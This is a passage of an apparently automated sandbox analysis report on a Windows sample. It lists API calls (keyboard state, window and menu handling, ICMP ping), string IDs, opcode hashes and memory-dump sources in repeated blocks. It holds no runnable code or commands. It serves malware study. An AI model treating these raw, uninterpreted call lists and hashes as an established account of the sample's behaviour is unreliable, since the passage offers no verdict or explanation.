                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00F6560B
                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00F6561C
                                    Similarity
                                    • API ID: SendString$_memmove
                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                    • API String ID: 2279737902-1007645807
                                    • Opcode ID: ef89638b85b9d3b66ea418f673876fd9c92ad20b24be998ffcca6d2e346781ec
                                    • Instruction ID: 0faa26b03b37c2423e82d04063de7f9344d1e10dd8a5c5b3bd6f2644627403af
                                    • Opcode Fuzzy Hash: ef89638b85b9d3b66ea418f673876fd9c92ad20b24be998ffcca6d2e346781ec
                                    • Instruction Fuzzy Hash: 8111C430E5026979D720B666CC4ADFFBBBCEF95F00F440469B401A20D1EEA66D05F9B2
                                    Similarity
                                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                    • String ID: 0.0.0.0
                                    • API String ID: 208665112-3771769585
                                    • Opcode ID: ce0952496026b8317158d82b4d78bc8304b3f4551dc6001726d17962c3eda8d1
                                    • Instruction ID: a512983ae6c44c52438d76265d8af77770fccbdd5f4bf1efbc41e6150ff894d8
                                    • Opcode Fuzzy Hash: ce0952496026b8317158d82b4d78bc8304b3f4551dc6001726d17962c3eda8d1
                                    • Instruction Fuzzy Hash: A111C331D04129AFDB24FB24AC06EEB77BCDB01720F1401B5F44596091EF75AA85FB61
                                    APIs
                                    • timeGetTime.WINMM ref: 00F6521C
                                      • Part of subcall function 00F20719: timeGetTime.WINMM(?,7694B400,00F10FF9), ref: 00F2071D
                                    • Sleep.KERNEL32(0000000A), ref: 00F65248
                                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00F6526C
                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00F6528E
                                    • SetActiveWindow.USER32 ref: 00F652AD
                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00F652BB
                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00F652DA
                                    • Sleep.KERNEL32(000000FA), ref: 00F652E5
                                    • IsWindow.USER32 ref: 00F652F1
                                    • EndDialog.USER32(00000000), ref: 00F65302
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                    • String ID: BUTTON
                                    • API String ID: 1194449130-3405671355
                                    • Opcode ID: 6c76dddb48ee7af6e6d375e9bb7cfbda5535e9d094bb12c49982496298fbe52a
                                    • Instruction ID: 42f6926a419148980af8c4cb8e835e60a48e6844f218416ece588f3a4c89b911
                                    • Opcode Fuzzy Hash: 6c76dddb48ee7af6e6d375e9bb7cfbda5535e9d094bb12c49982496298fbe52a
                                    • Instruction Fuzzy Hash: 5D21967120470CAFE7006F70EE8AFB93B6AEB55B56F181424F112D3171DB659C48BB21
                                    APIs
                                    • GetKeyboardState.USER32(?), ref: 00F605A7
                                    • SetKeyboardState.USER32(?), ref: 00F60612
                                    • GetAsyncKeyState.USER32(000000A0), ref: 00F60632
                                    • GetKeyState.USER32(000000A0), ref: 00F60649
                                    • GetAsyncKeyState.USER32(000000A1), ref: 00F60678
                                    • GetKeyState.USER32(000000A1), ref: 00F60689
                                    • GetAsyncKeyState.USER32(00000011), ref: 00F606B5
                                    • GetKeyState.USER32(00000011), ref: 00F606C3
                                    • GetAsyncKeyState.USER32(00000012), ref: 00F606EC
                                    • GetKeyState.USER32(00000012), ref: 00F606FA
                                    • GetAsyncKeyState.USER32(0000005B), ref: 00F60723
                                    • GetKeyState.USER32(0000005B), ref: 00F60731
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: State$Async$Keyboard
                                    • String ID:
                                    • API String ID: 541375521-0
                                    • Opcode ID: ddc15e9b48eabec6c82eaa2c59ad98b656b993c5e5b6d612c35b7c6e735cc1e5
                                    • Instruction ID: a985e16c92ad37c9c8ae721ad447035b617db47cf1af32a584c79e853293604c
                                    • Opcode Fuzzy Hash: ddc15e9b48eabec6c82eaa2c59ad98b656b993c5e5b6d612c35b7c6e735cc1e5
                                    • Instruction Fuzzy Hash: E851E920E0478829FB35DBB088547EBBFB49F11390F1C459AD5C25B1C2DE649E8CEB61
                                    APIs
                                    • GetDlgItem.USER32(?,00000001), ref: 00F5C746
                                    • GetWindowRect.USER32(00000000,?), ref: 00F5C758
                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00F5C7B6
                                    • GetDlgItem.USER32(?,00000002), ref: 00F5C7C1
                                    • GetWindowRect.USER32(00000000,?), ref: 00F5C7D3
                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00F5C827
                                    • GetDlgItem.USER32(?,000003E9), ref: 00F5C835
                                    • GetWindowRect.USER32(00000000,?), ref: 00F5C846
                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00F5C889
                                    • GetDlgItem.USER32(?,000003EA), ref: 00F5C897
                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00F5C8B4
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F5C8C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$ItemMoveRect$Invalidate
                                    • String ID:
                                    • API String ID: 3096461208-0
                                    • Opcode ID: 9b4d120b8b2c0d221ccdca937d142b9352cefdad1989b013df5109b22fea4493
                                    • Instruction ID: 7be312a1359ad279fc3e46ced3a45c8f42a1bbe046e91587e34d921e6afef674
                                    • Opcode Fuzzy Hash: 9b4d120b8b2c0d221ccdca937d142b9352cefdad1989b013df5109b22fea4493
                                    • Instruction Fuzzy Hash: BC513F71F00209AFDF18CF69DD89AAEBBB6EB88311F14812DFA16D6290D7709D449B50
                                    APIs
                                      • Part of subcall function 00F025DB: GetWindowLongW.USER32(?,000000EB), ref: 00F025EC
                                    • GetSysColor.USER32(0000000F), ref: 00F021D3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ColorLongWindow
                                    • String ID:
                                    • API String ID: 259745315-0
                                    • Opcode ID: a527f93261a4ff10be148898c10e8b980abb53828b1fb26401af63da6fd0ea55
                                    • Instruction ID: f8c89c5502b19c6b57842a544a71513d4d0c115bd85dd50c1d2afc433c098440
                                    • Opcode Fuzzy Hash: a527f93261a4ff10be148898c10e8b980abb53828b1fb26401af63da6fd0ea55
                                    • Instruction Fuzzy Hash: C941BF31400544AFEB615F68EC8CBB93B66EB46331F284265FD65CA1E2C7318C86FB61
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,00F8F910), ref: 00F6AB76
                                    • GetDriveTypeW.KERNEL32(00000061,00FBA620,00000061), ref: 00F6AC40
                                    • _wcscpy.LIBCMT ref: 00F6AC6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharDriveLowerType_wcscpy
                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                    • API String ID: 2820617543-1000479233
                                    • Opcode ID: 7b8b6076d110fc05eb2d6a3bb93f1e760d4cb26ab2cacd091a401cbc33b540fc
                                    • Instruction ID: 95b53b8947246438841e434ae8604f143489f8965ae57f7983df3964896352c0
                                    • Opcode Fuzzy Hash: 7b8b6076d110fc05eb2d6a3bb93f1e760d4cb26ab2cacd091a401cbc33b540fc
                                    • Instruction Fuzzy Hash: A1519A316083029FC710EF14CC81AAEB7A5EF85710F544829F496A72E2EB75E949FE53
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __i64tow__itow__swprintf
                                    • String ID: %.15g$0x%p$False$True
                                    • API String ID: 421087845-2263619337
                                    • Opcode ID: dd191652cceb4cfc4c9538a1f3bd4bab4f34c5b08234060e35422c900de47f7e
                                    • Instruction ID: 6274a55374b9f0aa37075b31339221aa5f66d3973b0c9b73d1bbde95a65fce43
                                    • Opcode Fuzzy Hash: dd191652cceb4cfc4c9538a1f3bd4bab4f34c5b08234060e35422c900de47f7e
                                    • Instruction Fuzzy Hash: AD41E672A08219AFDB24EB74DC42F7673E8EB04320F20446EE549D72D2EA759945BB11
                                    APIs
                                    • _memset.LIBCMT ref: 00F873D9
                                    • CreateMenu.USER32 ref: 00F873F4
                                    • SetMenu.USER32(?,00000000), ref: 00F87403
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F87490
                                    • IsMenu.USER32(?), ref: 00F874A6
                                    • CreatePopupMenu.USER32 ref: 00F874B0
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F874DD
                                    • DrawMenuBar.USER32 ref: 00F874E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                    • String ID: 0$F
                                    • API String ID: 176399719-3044882817
                                    • Opcode ID: 9b4837906021a7d627ba129ab60f1455ee6fb14e135209ca03c27dba3603af4f
                                    • Instruction ID: f6ae44e15d5da125114b93cc2cdd56904afe2ae48557562cbf0d636c906b2484
                                    • Opcode Fuzzy Hash: 9b4837906021a7d627ba129ab60f1455ee6fb14e135209ca03c27dba3603af4f
                                    • Instruction Fuzzy Hash: 9E413875A04349EFDB10EF64D888FEABBB5FF49310F244029E955A7360D731A914EB60
                                    APIs
                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00F877CD
                                    • CreateCompatibleDC.GDI32(00000000), ref: 00F877D4
                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00F877E7
                                    • SelectObject.GDI32(00000000,00000000), ref: 00F877EF
                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F877FA
                                    • DeleteDC.GDI32(00000000), ref: 00F87803
                                    • GetWindowLongW.USER32(?,000000EC), ref: 00F8780D
                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00F87821
                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00F8782D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                    • String ID: static
                                    • API String ID: 2559357485-2160076837
                                    • Opcode ID: 02c1c0a4ea27f3c58f5188fd208c2ae7b6fb5686d09a7de9ac2a76ccce0a0c24
                                    • Instruction ID: 835ad51c74b5e7741299be00ec25ddac9f6c05eba4c1c334b63c6dc5b954fd5e
                                    • Opcode Fuzzy Hash: 02c1c0a4ea27f3c58f5188fd208c2ae7b6fb5686d09a7de9ac2a76ccce0a0c24
                                    • Instruction Fuzzy Hash: BC316B32505219AFDF11AFA4DC09FEA3B69FF49320F210224FA15E60A0D735D825EBA4
                                    APIs
                                    • _memset.LIBCMT ref: 00F2707B
                                      • Part of subcall function 00F28D68: __getptd_noexit.LIBCMT ref: 00F28D68
                                    • __gmtime64_s.LIBCMT ref: 00F27114
                                    • __gmtime64_s.LIBCMT ref: 00F2714A
                                    • __gmtime64_s.LIBCMT ref: 00F27167
                                    • __allrem.LIBCMT ref: 00F271BD
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F271D9
                                    • __allrem.LIBCMT ref: 00F271F0
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F2720E
                                    • __allrem.LIBCMT ref: 00F27225
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F27243
                                    • __invoke_watson.LIBCMT ref: 00F272B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                    • String ID:
                                    • API String ID: 384356119-0
                                    • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                    • Instruction ID: e1ac86aee3cb108f62f46e68beb5cac8768a1de8a488d9dad94d04b4e5315653
                                    • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                    • Instruction Fuzzy Hash: 9871E772E04726EBD714EE79DC42B5BB3A8AF11370F14422AF514E72C1E774E944AB90
                                    APIs
                                    • _memset.LIBCMT ref: 00F62A31
                                    • GetMenuItemInfoW.USER32(00FC6890,000000FF,00000000,00000030), ref: 00F62A92
                                    • SetMenuItemInfoW.USER32(00FC6890,00000004,00000000,00000030), ref: 00F62AC8
                                    • Sleep.KERNEL32(000001F4), ref: 00F62ADA
                                    • GetMenuItemCount.USER32(?), ref: 00F62B1E
                                    • GetMenuItemID.USER32(?,00000000), ref: 00F62B3A
                                    • GetMenuItemID.USER32(?,-00000001), ref: 00F62B64
                                    • GetMenuItemID.USER32(?,?), ref: 00F62BA9
                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00F62BEF
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F62C03
                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F62C24
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                    • String ID:
                                    • API String ID: 4176008265-0
                                    • Opcode ID: 784ed760c217f9ccddccd86461f9817e8bb2f312475e03af6e9f062e5048fa3b
                                    • Instruction ID: 5534e76cb88e3885f08ce8edb34c2a8d31fe5a1f1ab125ffab64a79c46aae367
                                    • Opcode Fuzzy Hash: 784ed760c217f9ccddccd86461f9817e8bb2f312475e03af6e9f062e5048fa3b
                                    • Instruction Fuzzy Hash: 2C61D0B1900649AFDF61CFA4CD88EFE7BB8EB41324F140469E84197291D775AD09FB20
                                    APIs
                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F87214
                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F87217
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F8723B
                                    • _memset.LIBCMT ref: 00F8724C
                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F8725E
                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F872D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$LongWindow_memset
                                    • String ID:
                                    • API String ID: 830647256-0
                                    • Opcode ID: 3ac2c355c34678b3bfa49b366102442e36c30c0893bc678063eb0269bb681553
                                    • Instruction ID: 1ee01d92995fb71124a1bdfcf5874ebe7e814bc1ddfb2c22b357d1a307d8a73a
                                    • Opcode Fuzzy Hash: 3ac2c355c34678b3bfa49b366102442e36c30c0893bc678063eb0269bb681553
                                    • Instruction Fuzzy Hash: F1616971A04208AFDB10EFA4CD85FEE77B8EF09714F240169FA14E72A1D774A945EB60
                                    APIs
                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F57135
                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00F5718E
                                    • VariantInit.OLEAUT32(?), ref: 00F571A0
                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 00F571C0
                                    • VariantCopy.OLEAUT32(?,?), ref: 00F57213
                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00F57227
                                    • VariantClear.OLEAUT32(?), ref: 00F5723C
                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00F57249
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F57252
                                    • VariantClear.OLEAUT32(?), ref: 00F57264
                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F5726F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                    • String ID:
                                    • API String ID: 2706829360-0
                                    • Opcode ID: e9d7f46ab0d8409fc1057283ddd6b88ec3a2c3f5e76c4a2c640e881a2762be53
                                    • Instruction ID: 1a71613d422f1e0ea456e7a8e3e3e82f142c4bc4c3665dddedc30f084caf4bb9
                                    • Opcode Fuzzy Hash: e9d7f46ab0d8409fc1057283ddd6b88ec3a2c3f5e76c4a2c640e881a2762be53
                                    • Instruction Fuzzy Hash: 1E414035A04219AFCB00EF65DC449EEBBB9FF08355F008069FA55E7261DB34A949EF90
                                    APIs
                                    • WSAStartup.WS2_32(00000101,?), ref: 00F75AA6
                                    • inet_addr.WS2_32(?), ref: 00F75AEB
                                    • gethostbyname.WS2_32(?), ref: 00F75AF7
                                    • IcmpCreateFile.IPHLPAPI ref: 00F75B05
                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F75B75
                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F75B8B
                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F75C00
                                    • WSACleanup.WS2_32 ref: 00F75C06
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                     • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                    • String ID: Ping
                                    • API String ID: 1028309954-2246546115
                                    • Opcode ID: 78d1715ae2ae8bae478e86212a07aabc3ead31ce4f9024685c8b1507397e541c
